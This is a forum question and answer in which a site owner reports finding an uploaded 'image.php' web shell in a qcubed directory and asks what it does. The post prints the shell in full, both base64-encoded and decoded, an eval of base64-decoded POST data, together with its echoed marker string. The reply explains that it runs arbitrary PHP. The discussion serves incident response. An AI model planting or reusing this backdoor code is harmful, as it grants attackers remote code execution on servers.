Home/ Questions/Q 3397502
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-18T04:32:11+00:00

Ok so here’s what I’ve googled: It seems there is an uploaded file named

  • 0

Ok so here’s what I’ve googled:

It seems there is an uploaded file named “image.php” that is uploaded in a qcubed directory.

That image.php file contains the following base64 code:

aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==

decoded it adds to this:

if(isset($_POST['e']))

eval(base64_decode($_POST['e']));

echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';

Searching for the outputed string I found simillar qcubed vulnerabilities on other sites.

Decoding the last echoed string I got:

196.231-172.28:ifacermpubmice:afac42eri02

Which I really don`t understand what it does (using:http://ostermiller.org/calc/encode.html).

Can you please explain me what in particular I`m facing here?
What security vulnerability I should adress in order to fix this?

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    The script will execute any PHP code it gets from the e POST variable, which of course is a horrible, most dangerous vulnerability.

    The echo statement might be a confirmation for the attacking script that the correct version is installed or something.

    However, this is only dangerous if the image.php file can actually be executed in that directory. It’s hard to give advice on what to do without knowing how the file got there in the first place.

    • 0